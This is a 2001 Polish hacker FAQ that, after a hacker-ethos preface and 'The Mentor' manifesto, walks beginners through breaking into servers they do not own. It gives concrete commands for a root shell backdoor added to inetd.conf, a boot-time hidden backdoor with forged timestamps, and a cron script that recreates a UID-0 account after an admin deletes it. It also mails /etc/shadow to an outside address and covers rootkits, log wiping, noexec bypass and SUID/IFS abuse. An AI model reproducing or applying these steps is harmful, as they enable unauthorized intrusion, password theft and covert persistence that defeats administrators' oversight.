=============================================================
RRRRR  33333  BBBBB   000   000  TTTTTT     FFFFF  AAA   QQQ
R    R      3 B    B 0  00 0  00   TT       F     A   A Q   Q
RRRRR   3333  BBBBB  0 0 0 0 0 0   TT       FFFF  AAAAA Q   Q
R  R        3 B    B 00  0 00  0   TT       F     A   A Q Q Q
R   R  33333  BBBBB   000   000    TT       F     A   A  QQQ
                                                           Q

R3B00T FAQ v1.0
Copyright (c) R3B00T
http://r3b00t.prv.pl
mailto:r3b00t@go2.pl
-------------------------------------------------------------
[root@localhost]# date
Mon Oct 23 20:11 2001
[root@localhost]#
-------------------------------------------------------------
[01h] Intro
[02h] Jak zdobyc roota gdy mam konto na servie?
[03h] Jak zdobyc roota gdy NIE mam konta na serverku?
[04h] Jak zalozyc backdoora?
[05h] Jak odpalic exploita w Filesystem NOEXEC?
[06h] Jak zwiekszyc zywotnosc backdoora?
[07h] Jak zatrzec slady w systemie?
[08h] Jak zdobyc root'a przez skrypt lub program z SUIDem?
[09h] Outro
=============================================================
		
[01h] INTRO
FAQ najlepiej czyta sie w notatniku. Jesli uzywasz innego edytora to uzyj czcionki Courier New CE.
Text ten przeznaczony jest dla poczatkujacych _hackerow_ wiec zakladam ze znasz podstawy Linuxa - jest to wymagane _minimum_. Nie oznacza to, ze FAQ bedzie niezrozumiale. Oznacza to ze, aby cos dobrze zrozumiec musisz:
- miec zainstalowanego linucha w domciu,
- umiec sie nim poslugiwac
- umiec pisac skrypty [chociaz banalne],
- znac zasady dzialania sieci i sprzetu sieciowego [protokoly, karty sieciowe, itp],
- byc obeznanym w sofcie [chodzi mi tu o sniffery, skanery, spoofery itp]
Jezeli jednak nie masz zielonego pojecia co to Linux, serwer czy router to szczerze odradzam dalsze czytanie.

Jak ktos chcialby umiescic fragment mojego FAQ w swoim to prosze o zaznaczenie z czyjego pochodzi [fragment] oraz powiadomic mnie o tym. Thx!

Na poczatek text autorstwa AnG3L'a [angel@qdnet.pl]:

Przebywajac na IRC`u czesto w pewnym momencie ktos Cie pyta "czy ty jestes hackerem" ? A ty na to nieskromnie odpowiadasz "kolejny lamer..." ;) (to tylko przyklad). No wlasnie, kim jest prawdziwy hacker ? Po czym to poznac ? Hacker w zlym porownaniu moze byc od uzytkownikia komputera - do kogos, kto niszczy wszystko do czego moze sie wlamac. Hacker... no wlasnie, kim on jest? Hackerzy sa inteligentni ;) poniewaz musza tacy byc. Chodza do normalnych szkol (zawodowy nie wchodza raczej w gre ;> albo nie chodza bo szkola jest okropnie nudna (preferuje to drugie ;). Jednak wiekszosc chodzi do szkol... Prawdziwy hacker chce wiedziec wszystko. Hackerzy sa znudzeni, poniewaz szkola uczy nudnych rzeczy w kolko, nie wprowadza nic nowego, nic co wyzywalo by na pojedynek. Przeciez lekcje informatyki w podstwowkach to czysta strata czasu. Z reguly ucza tam podstaw DOSa, obslugi NC i Windows. W liceach jest chyba troche lepiej bo ucza C albo Pascala, lecz ogolnie poziom nauczania jest zalosny...
Prawdziwi hackerzy sa przede wszystkim cierpliwi. Jesli taki nie jestes to po co ciezko pracujesz hackujac pojedynczy system, dla jednego nedznego konta, na ktorym nawet nie mozna postawic bota z powodu slimaczego transferu. Czesto jest tak, ze zostawiajac sniffera, cierpliwie czekasz nawet kilkanascie dni na jakas ciekawa informacje... ;) Prawdziwy hacker NIE WLAMUJE sie do systemu zeby zabic wszystko albo sprzedac dane komus obcemu. Prawdziwi hackerzy pragna sie uczyc, chca udowadniac sobie ze sa na tyle dobrzy by wlamac sie do obcego systemu ( ach ta megalomania... ;). Glownym motorem jest takze rywalizacja i wspolzawodnictwo z administratorem systemu. Nie ma nic przyjemniejszego niz udowodnic, przekonanemu o swojej potedze adminowi systemu, ze jest zwyklym lamerem. Lamerem ktory bierze ciezkie pieniadze za administrowanie systemu, uwazanego za guru w firmie. Potoczne okreslenie na takich adminow to ladmin (lamer + admin). Hackerzy pragna poruszac sie bez ograniczen po systemie w ktorym nigdy nie byli. Chca explorowac "swiaty", ktore fascynuja ich egzotyka kont i szarych uzytkownikow systemu... Po co niszczyc cos, co moze dawac tyle satysfakcji komus innemu? Dlaczego grupka lamerow ma psuc opinie elicie? Prawdziwi hackerzy sa przezorni. Mam na mysli to ze trzymaja mordy zamkniete na klodke, oczywiscie w srodowisku zaufanych przyjaciol mozna sie pochwalic :) Nie zadaja poklasku dla swoich dokonan (takze sa wyjatki). Powiesz jakiemus kumplowi ze szkoly a w niedlugim czasie ludzie z wladza (Men in Black ;) dowiedza sie kto Ty jestes, co zrobiles i masz klopoty. Z reguly nic Ci nie moga zrobic, ale zawsze potrafia narobic smrodu.
A teraz cos bardziej na czasie. Czesto gdy jestes na IRCu i rozmawiasz z kolegami rozmowie przysluchuje sie sporo osob. Najczesciej sa to chakerzy z TP SA (chociaz niekoniecznie kazdy kto laczy sie przez TP SA musi byc lamerem). Po pewnym czasie zasypuja cie txtami w stylu: "Jestes super, zostaniesz moim nauczycielem" albo "Bedziesz moim GURU"? Przeciez to jest smieszne... Goscia ktory wyskakoczy z takim txtem traktuje sie jak cos najgorszego, piate kolo u wozu. Troche to dziwne, ale srodowisko jest szczelnie zamkniete. Kazdy nowy ryjek na kanale, jesli naprawde nie jest dobry, albo nie ma znajomosci jest poprostu ignorowany. Druga sprawa to darmowe numery. Ten temat byl walkowany od poczatku... Jesli ktos flooduje txtem "kto zna darmowe numery 0-800?" od razu dostaje bana. Nawet jesli ktos znalby 0-800 do sieci to watpie by sie z kims podzielil...
Kwestia dzielenia sie wiedza. Duzo osob powiada: "Informations wants to be free" i inne takie piekne epitety. Lecz czy jest to prawda? Oczywiscie ze blokowanie wiedzy nie jest dobra rzecza (nawet zla), lecz istnieja przypadki w ktorych blokowanie dostepu do informacji osobom postronnym jest wrecz podstawa. Na przyklad zin h@ckpl. Duzo osob obuza sie ze "CO !?! nie moge dostac hasla do zina, ty pierdolony lamerze, co z ciebie za hacker, prawdziwy hacker podzielil by sie wiedza, informajszyn lonts tu ... ble ble ble......." Zin h@ckpl jest blokowany haslem i serial numberem z prostej przyczyny. Informacje tam zawarte moglyby przysporzyc niektorym autorom klopotow. Takze pass dostaja osoby zaufane lub ktore napisza jakis artykul.
Za bardzo nie wiem komu ten plik moze sluzyc, moze komus kto to przeczyta i wreszcie pozna prawde o hackerach. To nie sa klamstwa ani wymysly. Pamietaj o tym ze grupka lamerow (chakerow) nie moze odpowiadac za wszystkich hackerow. Tu nie ma zasady "jeden za wszystkich, wszyscy za jednego". Ten txt ma uzmyslowic ludziom, ktorzy lubia miec przyczepiona plakietke "HACKER" ze nie w tym rzecz.

Uznalem ze ten swietny text jest idealny na wstep do mego FAQ. Rozwiewa chyba wszelkie, a przynajmniej wiekszosc watpliwosci na temat hackerow. W tym miejscu naleza sie podziekowania AnG3L'owi, tez za to ze umiescilem go bez pytania. A to text nazwany manifestem hackerow, w oryginalnym jezyku angielskim, przeczytaj bo warto:

"Mentor's Last Words"

Another one got caught today, it's all over the papers.
"Teenager Arrested in Computer Crime Scandal", "Hacker Arrested 
after Bank Tampering"... Damn kids. They're all alike. But did
you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker? Did you ever
wonder what made him tick, what forces shaped him, what may
have molded him? I am a hacker, enter my world... Mine is a
world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me... Damn
underachiever. They're all alike. I'm in junior high or high
school. I've listened to teachers explain for the fifteenth
time how to reduce a fraction. I understand it.
"No, Ms. Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike. I made a
discovery today. I found a computer. Wait a second, this is 
cool. It does what I want it to. If it makes a mistake, it's
because I screwed it up. Not because it doesn't like me...
Or feels threatened by me... Or thinks I'm a smart ass.. Or
doesn't like teaching and shouldn't be here... Damn kid.
All he does is play games. They're all alike. And then it
happened... a door opened to a world... rushing through the
phone line like heroin through an addict's veins, an electronic
pulse is sent out, a refuge from the day-to-day
incompetencies is sought... a board is found.
"This is it... this is where I belong... "I know everyone
here... even if I've never met them, never talked to them,
may never hear from them again... I know you all... Damn kid.
Tying up the phone line again. They're all alike... You bet your
ass we're all alike... we've been spoon-fed baby food at school
when we hungered for steak... the bits of meat that you did let
slip through were pre-chewed and tasteless. We've been
dominated by sadists, or ignored by the apathetic. The few
that had something to teach found us willing pupils, but those
few are like drops of water in the desert. This is our world now...
the world of the electron and the switch, the beauty of the baud.
We make use of a service already existing without paying for
what could be dirt-cheap if it wasn't run by profiteering gluttons,
and you call us criminals. We explore... and you call us criminals.
We seek after knowledge... and you call us criminals.
We exist without skin color, without nationality,
without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder,
cheat, and lie to us and try to make us believe it's for
our own good, yet we're the criminals.
Yes, I am a criminal.
My crime is that of curiosity.
My crime is that of judging people by what they say and think,
not what they look like.
My crime is that of outsmarting you, something that you will never 
forgive me for.
I am a hacker,
and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.

+++The Mentor+++

[May the members of the phreak community never forget his words -JR]



[02h] JAK ZDOBYC ROOTA GDY MAM KONTO NA SERVIE?
Jezeli mamy konto na servie to juz jest ok. 60% sukcesu! Nie bede tu duzo pisal, poniewaz sprawa jest prosta [no moze nie az tak]. Po prostu musimy sie dowiedziec o haczonym systemie jak najwiecej [nazwa, wersja, zainstalowane pakiety, daemony] - przyda sie doslownie wszystko:

[johny@ofiara.com]~$ ifconfig >> dane
[johny@ofiara.com]~$ cat dane |grep PROMISC
       UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
                            ^^^^^^^
W powyzszym fragmencie widac ze karta sieciowa ustawiona jest w tryb mieszany, bezladny [napis PROMISC]. Jezeli po wydaniu polecenia zobaczysz PROMISC to znaczy, ze w sieci dziala sniffer - uwazaj wiec!

[johny@ofiara.com]~$ cat /etc/issue <-- moze byc umyslnie zmieniona przez admina
[johny@ofiara.com]~$ cat /etc/issue.net
[johny@ofiara.com]~$ uname -a >> dane
[johny@ofiara.com]~$ echo -e "\n" >> dane; rpm -qa >> dane
[johny@ofiara.com]~$ telnet localhost 23
[johny@ofiara.com]~$ telnet localhost 25

Chyba wystarczy... Jak juz znasz wersje systemu i zainstalowanych pakietow to szukasz exploitow na dane programy. Nie bede tu podawal adresow stron. Po prostu wejdz na AltaVista.com i wpisz exloit. Znajdz i uruchom :)



[03h] JAK ZDOBYC ROOTA GDY NIE MAM KONTA NA SERVERKU?
Na poczatek do roboty pojdzie zwykly skaner sieciowy [polecam nmap]. A wiec skanujemy... daje nam to przykladowo taki wynik:

Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
79/tcp     open        finger
80/tcp     open        http
110/tcp    open        pop3

Pamietaj aby duzo sie dowiedziec o skanerze ktorego uzywasz. Mozemy trafic na system z zainstalowanym np. scan-detector'em. Niektore zostawiaja po sobie wpisy w logach skanowanego serva! Ile to razy slyszalem ze client skanuje serverek i nazajutrz ma juz przesrane. Najlepiej uzywaj skanera, ktory oferuje skanowanie utajnione jak w przypadku nmap lub nie daj sie namierzyc. Jak juz mamy dostepne uslugi na porty, telnetujemy sie na port 23. Jezeli wszystko pojdzie dobrze otrzymamy nazwe i wersje systemu:

[johny@shell.com]~$ telnet nasz_cel.com 23
Trying xxx.xxx.xxx.xxx...
Connected to nasz_cel.com
Escape character is '^]'.
UNIX(r) System V Relase 4.0
Login:

Warto tez wklepac:

[johny@shell.com]~$ host -l -v -t nasz_cel.com >> dane
[johny@shell.com]~$ echo -e "\n\n" >> dane
[johny@shell.com]~$ whois nasz_cel.com >> dane
[johny@shell.com]~$ echo -e "\n\n" >> dane
[johny@shell.com]~$ finger @nasz_cel.com >> dane

W ten sposob do pliku dane zapiszemy troche informacji nie tyle o samym hoscie co i o jego uzytkownikach. Czasem sie to przydaje. Dysponujac nazwami userow mozemy zadac sobie troche wiecej trudu i poszukac wyslanych przez nich listow [np. na Usenet]. W naglowkach takich maili istnieje bardzo ciekawa dla nas linijka, np.:

X-Mailer: Mozilla 4.04 - (X11; U; SunOS 5.6 sun4u)

Poza tym mamy takze informacje o innych kompach w sieci i zainstalowanych systemach. Dzieki tym 3 poleceniom dostajemy bardzo duzo infa o strukturze sieci, a nawet o programach, ktore odpalaja jej uzytkownicy. Jezeli odnajdziemy bugi na te systemy i istnieje relacja upowaznienia bez podawania hasla to przejmujac kontrole nad jednym z kompow sieci mozemy zalogowac sie na serwer bez podawania hasla. 

         <Serwer>   <A>
                \   /
                 \ /
                  *----<D>
                 / \   
                /   \
              <B>    <C>


Powyzej stworzylem bardzo prosty schemat sieci [gwiazda]. Wiemy ze komputer <A> ufa kompowi <C>, a serwer ufa kompowi <A>. Znamy dziure na <C> i mamy exploit :> Teraz pytanie: jak dobrac sie do serwera? W teorii odpowiedz jest prosta. Przejmujemy kontrole nad kompem <C> i logujemy sie na <A>. Z <A> logujemy sie na <Serwer>. Teraz musimy sie rozeznac w systemie - dowiedziec sie o nim jak najwiecej. Jak juz znajdziemy dziure w calym to ja wykorzystujemy i root jest nasz. Wyglada to na proste jednak w rzeczywistosci tak nie jest i trzeba poswiecic na to duuuzo czasu. Nie zawsze aby sie wlamac trzeba wykorzystac jakis exploit. Czesto sami mozemy wykryc luke do ktorej zaden programik nie bedzie potrzebny. Administratorzy tworza sobie czasem tylne furtki do swoich jakis tam celow [czytalem swego czasu text o systemach Pentagonu w ktorym bylo napisane, ze hakerzy czesto korzystaja z luk, ktore tworza administratorzy dla wlasnego uzytku - chyba jednak nie dla wlasnego :)] - to mozemy wykorzystac. Moze tez sie zdazyc, ze trafimy na zalozonego przez kogos backdoor'a [egzotyczny port] jednak mi to sie nigdy nie przytrafilo :|

Przyda sie tez wyslac maila pod adres np. gowno@nasz_cel.com. Takiego adresu pewnie nie ma, wiec mail do nas wroci. Jednak w naglowku takiego maila bedzie troche przydatnych informacji - wystarczy sie przyjrzec. 
Nastepny krok - sprawdzamy wersje mailera:

[johny@shell.com]~$ telnet nasz_cel.com 25
220 nasz_cel.com ESMTP Sendmail 8.8.7/8.8.7; Sat, 22 Oct 2000 17:56:56 +0100

I powyzej mamy wersje sendamaila. Jesli bedzie to jakis stary, zabytkowy sendmail to sprawdzamy na niego buraczki i sciagamy co potrzeba.
Teraz obczajamy usluge FTP:

[johny@shell.com]~$ telnet nasz_cel.com 21

Jezeli okarze sie ze np. serverek korzysta z dziuuurawego WU-FTPD [z tymi dziurami w WU-FTD to juz chyba tradycja] to zapisujemy to sobie. Bardzo popularnym bugiem dla WU-FTPD to SITE EXEC - wpisz a mozliwe, ze otrzymasz shella w starszych systemach.

Na jakies 90% nasz serwer oferuje http pod Apache'em. W takim razie nie zaszkodzi wybadac slabych stron np. CGI w nasz_cel.com/cgi-bin. Administratorzy bardzo czesto zapominaja o tych nie wykorzystywanych i zostawiaja w folderze dziurawe na pastwe hackerow ;) Pomoze nam w tym bardzo dobre narzedzie, a mianowicie CGI scanner. Pozwala on na szybkie, zdalne skanowanie hostow WWW [UNIX i NT]. Oto przyklad:

[CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 11.03.99
[ Press any key to check out the httpd version...... ]
HTTP/1.0 200 Document follows
Date: Tue, 01 Jun 1999 09:44:14 GMT
Server: NCSA/1.4.1
Content-Type: text/html
[ Press any key to search 4 CGI stuff..... ]
Searching for aglimpse         :Not Found
Searching for handler          :Found !! ;)
Searching for webdist.cgi      :Found !! ;)

Powyzej jest tylko fragment wynikow skanowania - nie chcialo mi sie, szkoda miejsca - ale tyle w zupelnosci wystarczy. CGI scanner wykryl dwie luki:
*) /cgi-bin/handler
*) /cgi-bin/webdist.cgi
Teraz wystarczy poszukac informacji o tych dwoch plikach i odpowiednio to wykorzystac :> Do bazy programu mozna takze dodawac nowe wpisy o lukach.

Dobraaa, chyba juz wystarczy tego. Szukamy odpowiednich remote exploitow pod demona, system lub jeszcze cos innego. Szybki logon shell i odpalamy az do skutku, for example:

[johny@shell.com]~$ gcc sploit.c -o sploit
[johny@shell.com]~$ ./sploit nasz_cel.com

Powinnismy otrzymac shella i teraz tylko 
#whoami
root


[04h] JAK ZALOZYC BACKDOORA?
Masz juz roota, ale co dalej? Teraz trzeba zapewnic sobie wrota na pozniej, darmowe konto shellowe i to z urawnieniami roota! Na poczatek przedstawie pliki z ktorymi musisz sie zapoznac:

[root@ofiara.com]~# cat /etc/services <-- tu sa wszystkie uslugi
tcpmux		1/tcp	# TCP port service multiplexer
echo		7/tcp
echo		7/udp
discard		9/tcp	sink null
discard		9/udp	sink null
systat		11/tcp	users
daytime		13/tcp
daytime		13/udp
netstat		15/tcp
qotd		17/tcp	quote
msp		18/tcp	# message send protocol
msp		18/udp	# message send protocol
chargen		19/tcp	ttytst source
chargen		19/udp	ttytst source
ftp-data        20/tcp  # File Transfer [Default Data]
ftp-data        20/udp  # File Transfer [Default Data]
ftp             21/tcp  # File Transfer [Control]
ftp             21/udp  # File Transfer [Control]
ssh             22/tcp  # Secure Shell Login
ssh             22/udp  # Secure Shell Login
telnet          23/tcp
telnet          23/udp

[root@ofiara.com]~# cat /etc/inetd.conf <-- demony pod uslugi, itp. itd.
ftp    stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h
ssh    stream tcp nowait root /usr/sbin/tcpd /usr/local/sbin/sshd -i

Teraz dopiszemy swoja wlasna usluge, ktora po polaczeniu sie z nia przyzna nam shella. Jest to chyba najprymitywniejszy backdoor i bardzo prosty do wykrycia [chyba ze admin to ostatni lamer czyt. ladmin]:

[root@ofiara.com]~# echo "webster stream tcp nowait root /bin/bash -i" >> /etc/inetd.conf
[root@ofiara.com]~# echo "webster 765/tcp" >> /etc/services
[root@ofiara.com]~# cat /etc/services |grep 765 webster 765/tcp
[root@ofiara.com]~# cat /etc/inetd.conf |grep websterwebster stream tcp nowait root /bin/bash -i [root@ofiara.com]~# killall -HUP inetd

Laczymy sie ze zhaczonym serverem na port naszego tylnego wejscia:

<johny@shell.com>~$ telnet ofiara.com 765
Trying xxx.xxx.xxx.xxx... <-- to jest IP serwera :)
Connected to ofiara.com
Escape character is '^]'.
bash#
bash# whoami
root
bash#

Mozna tez postawic taka 'standardowa' furtke w C, ktora tylko siedzi i binduje sie na okreslonym porcie i czeka na haslo. Jak dostanie haselko to daje nam shella [oczywiscie z uidem 0]. Takich backdoorow jest pelno w sieci - wystarczy poszukac. A teraz prosty schemat jak zalozyc:

[root@ofiara.com]~# gcc furtka.c -o .furtka
[root@ofiara.com]~# rm furtka.c
[root@ofiara.com]~# cp .furtka /etc
[root@ofiara.com]~# touch -r /bin/bash /etc/.furtka
[root@ofiara.com]~# echo "/etc/.furtka&" >> /etc/rc.d/rc.local

I juz jest. Parametr -r w poleceniu touch spowoduje, ze admin gowno znajdzie szukajac zmian w systemie przez find / -ctime. Ostatnia linijka zapewni nam uruchomienie backdoora [w tle] po kazdym restarcie systemu. Problem w tym ze nie wiadomo kiedy ten restart nastapi. Jak chcesz wszystko przyspieszyc to zostaje Denial of Service czyli w skrocie DoS ;]

Kolejnym sposobem na zapewnienie sobie shella ;> to modyfikacja ewentualnie dodanie konta guest, lub takiego, ktore nie rzuca sie w oczy z UIDem 0. I w tym miejscu wpadlem na pewien pomysl jak zabezpieczyc nasze konto przed adminem. Konto bedzie sie tworzylo same po usunieciu go przez admina. Glupi admin bedzie myslal, ze zalatwil sprawe. W jaki sposob? Najpierw bedziesz musial napisac pewien skrypt, ktory nam to umozliwi. Napisalem tu prosty przyklad - mozesz go sobie skopiowac i ewentualnie zmodyfikowac, poprawic:

---CUT HERE---
#!/bin/bash
if [ 'cat /etc/passwd |grep guest::0:0:guest:/:/bin/sh |wc -l' = 0 ];
then
echo "guest::0:0:guest:/:/bin/sh" >> /etc/passwd #uwazaj na shadowing
fi
---CUT HERE---

Ten plik nazywasz np. .recover i zapisujesz w /usr/bin. Teraz musisz dodac ta oto linijke do crona:

[root@ofiara.com]~# echo "0 0 * * 6 /usr/bin/.recover" >> /var/spool/crontabs/cron/root

Teraz tylko: chmod +s /usr/bin/.recover i gotowe. Co tydzien cron odpali na serverku nasz skrypcik, ktory sprawdzi czy nasze konto istnieje - jezeli nie, utworzy je.

Jesszcze na wszelki wypadek:
[root@ofiara.com]~# cat /etc/shadow |mail johny@go2.pl
Nie zaszkodzi rozkodowac sobie pare dodatkowych kont Johnym...

Teraz opisze jak dziala moj skrypcik - autodoor.gz:
[root@ofiara.com]~# autodoor
Auto-Backdoor by R3B00T - finished at 29.10.01
Usage: ./autodoor <password for backdoor>

[root@ofiara.com]~# autodoor r3b00t
Please stand by.....Done.

Powyzej pokazalem sposob odpalenie - prosty, wrecz trywialny. Dopisuje on do crona polecenie, aby o godz. 20 kazdego dnia [mozesz to zmodyfikowac w kodzie] odpalal skrypt stworzony przez niego skrypt, ktory znowu tworzy nam luke na 5 minut [to tez mozesz modyfikowac] - pozniej wszystko wraca do normy. A wiec po godz. 20:00 laczymy sie z servem na port 765 i podajemy wczesniej zdefiniowane w wierszu polecen przez nas haslo [w naszym przypadku r3b00t]:

[root@shell.com]~$ telnet ofiara.com 765
Trying xxx.xxx.xxx.xxx... 
Connected to ofiara.com
Escape character is '^]'.
Enter password: r3b00t
bash#
bash# whoami
root
bash#

Jak wszystko bedzie OK dostajemy shella! Sciagnij go sobie z mojej strony i przeanalizuj dokladnie jego kod [mozesz zmodyfikowac np. godzine o ktorej tworzy sie luka i na jaki okres czasu] bo wiem ze troche namieszalem. Ta furtka na 5 minut to male zabezpieczenie przed adminem, ktoremu sie nudzi i przeglada /etc/inetd.conf ;) Haslo jest po to, aby nikt nie dobral sie do TWOJEJ furtki. Auto-Backdoora mozesz sobie sciagnac z mojej strony...

I pamietaj ze nawet jak juz masz zapewnione wejscie do systemu to wlaz petelka, bo nigdy nic nie wiadomo. Na przyklad admin znajdzie backdoora i zastawi na ciebie pulapke lub twoje IP zgarnie jakis sniffer - uwazaj. Poza tym jak nie bedziesz szalal i admin nie zauwazy zadnych zmian w systemie to twoje tylne wejscie moze sobie owocnie zyc bardzo dlugo.



[05h] JAK ODPALIC EXPLOITA W FILESYSTEM NOEXEC?
To juz bylo w wielu innych FAQ, ale coz. Ponizszy przyklad mowi sam za siebie:

[johny@shell.com]~$ gcc -o exploit.c exploit
[johny@shell.com]~$ exploit ofiara.com
bash: sploit: Permission danied
[johny@shell.com]~$ /lib/ld-linux.so.2 exploit ofiara.com

Jezeli admin odebral Ci prawa do uruchamiania jakiegos programu np. who to wystarczy tylko:

[johny@shell.com]~$ /lib/ld-linux.so.2 /usr/bin/who
root    tty1    Oct 25 22:44
marcin  tty2    Oct 25 22:45



[06h] JAK ZWIEKSZYC ZYWOTNOSC BACKDOORA?
Aby wydluzyc czas zycia naszej furtki czasem warto jest uzyc jakiegos RootKit'a [od Linux Root Kit]. Zazwyczaj sa to przerobione /bin/ls, /bin/netstat, /bin/ps, /bin/find, ktore 'pomagaja' ukryc nasze pliki. RootKity posiadaja pliki konfiguracyjne, ktore zawieraja rozne rzeczy do ukrycia:
- adresy IP i numery portow ktore maja byc ukryte dla polecenia netstat
- nazwy plikow lub katalogow do ukrycia przed find i ls
- nazwy procesow ktore maja byc ukryte przed ps

Podmieniasz oryginalne ls, netstat, ps i find na przerobione i edytujesz pliki konfigurcyjne dla nich - musza wiedziec co maja ukrywac i tyle. Chyba jedyna wada RootKita jest to, ze admin moze nas wykryc narzedziami w stylu tripware :/ Ale coz, nie mozna miec wszystkiego.



[07h] JAK ZATRZEC SLADY W SYSTEMIE?
Na poczatku musisz wiedziec gdzie owe 'slady' w systemie sie znajduja ;) Wiekszosc uslug *nixowych rejestruje swoje dzialanie w standardowych logach. Wiekszosc z nich znajduje sie w /var/log. Chociaz istnieja narzedzia pozasystemowe, komercyjne, ktore zapisuje je gdzie indziej [ale przeciez ich nie bede tu opisywal]. W pliku /var/log/lastlog zapisane sa procedury logowania uzytkownikow. Przyklad:

[root@localhost]~# lastlog -u root
Username         Port         From       Latest
root             tty1                    Mon Oct 23 09:21:45 2000

Polecenie lastlog pobiera dane z /var/log/lastlog i odpowiednio je formatuje. Wyswietli kiedy zalogowal sie root. Wszystko jasne i czytelne.

W pliku /var/log/wtmp znajduja sie informacje o: nazwie uzytkownika, terminalu, adresie IP lub nazwie hosta, dacie, godzinie oraz czasie trwania sesji. Jak widzisz tutaj jest tego najwiecej. Gdy admin wyda polecenie:

[root@localhost]~# last root
root             tty2                    Mon Oct 2 09:01:34 - down (00:54)
root             tty3                    Mon Oct 2 09:21:45 - down (00:57)
wtmp begins Mon Oct 2 07:23:18 2001

Daje mu to info kiedy root w ogole, w calej swojej 'karierze' logowal sie do systemu, skad, na ile, itd.
Mowiac scislej pliki, ktore Cie interesuja to wszystkie [z malymi wyjatkami] znajdujace sie w /var/log. A to te glowne:
- /var/log/wtmp
- /var/log/utmp
- /var/log/lastlog
Pliki te nie sa logami textowymi wiec edycja vi odpada - trzeba uzyc 'special program'. Musisz takze uwazac przy 'czyszczeniu' logow czy aby nie ma w systemie zainstalowanych jakis progow do analizy logow systemowych [np. chkwtmp]. Jak taki program 'zweszy', ze ktos dobiera sie do logow to admin zostanie o tym powiadomiony i po tobie :|
Aby nie zostawic po sobie sladow skorzystamy z narzedzia, ktore je za nas zatrze [to te 'special programs']. Najpopularniejsze to: 
*) Cloak
*) utclean
*) remove
*) marry. 
Mozesz takze sciagnac napisany przeze mnie skrypt shit.gz, ktory wyczysci za Ciebie poczte do roota, ktora jest tworzona przez rozne programy - czasem to moze nam uratowac tylek. Poza tym historie, .bash_history i pare innych rzeczy. Zrobi troche za nas i przyspieszy nieco czas calego wlamu...
 


[08h] JAK ZDOBYC ROOT;A PRZEZ SKRYT LUB PROGRAM Z SUIDEM?
Jesli namierzony przez ciebie prog wywoluje inne uzywajac funkcji system() mozesz sie zabawic zmieniajac tzw. IFS [Internal Field Separator]. Nazwa mowi sama za siebie. Dla tych co nie sa orlami z angilka: sluzy do okreslania separatora polecen, np:

[root@localhost]~# ls -aol > directory ; echo -e "\n" >> directory
                                       ^
                                nasz separator

Jesli funkcja ta wyglada w ten sposob:

system("/bin/date")

to zmieniajac IFS z ';' na '/' powloka odczyta to jako 'bin date' zamiast '/bin/date'. Daje nam to wiele mozliwosci. Majac program 'bin' zostanie on odpalony z uprawnieniami np. root'a!
Do zmiany IFS posluza nam polecenia:

IFS='/' ; export IFS # Bourne
setenv IFS '/'       # C
export IFS='/'       # Korn



[09h] OUTRO
Pamietaj, ze jak juz sie wlamujesz do systemu to staraj sie wszystko zrobic szybko, porzadnie i dokladnie. Bardzo polecam maly trening przed wlamem. Chodzi mi tu o to aby skonfigurowac wlasna maszyne mozliwe tak jak skonfigurowany jest nasz cel i sprobowac sie na nia wlamac. Zyskamy troche wiecej doswiadczenia, a moze nawet zabezpieczymy sie przed bledami. Wiem ze to troche roboty, ale naprawde sie oplaca. 

Jak masz jakies pytania [byle nie lamerskie] to pisz smialo na r3b00t@go2.pl

=====================================================
Greetz to:
Asvalt, SamkO, kAczan, Shooler, Nimloth, Haclet
cav3ral, deefes, jerry, ^slodka & 4 all about I forget 

EOF

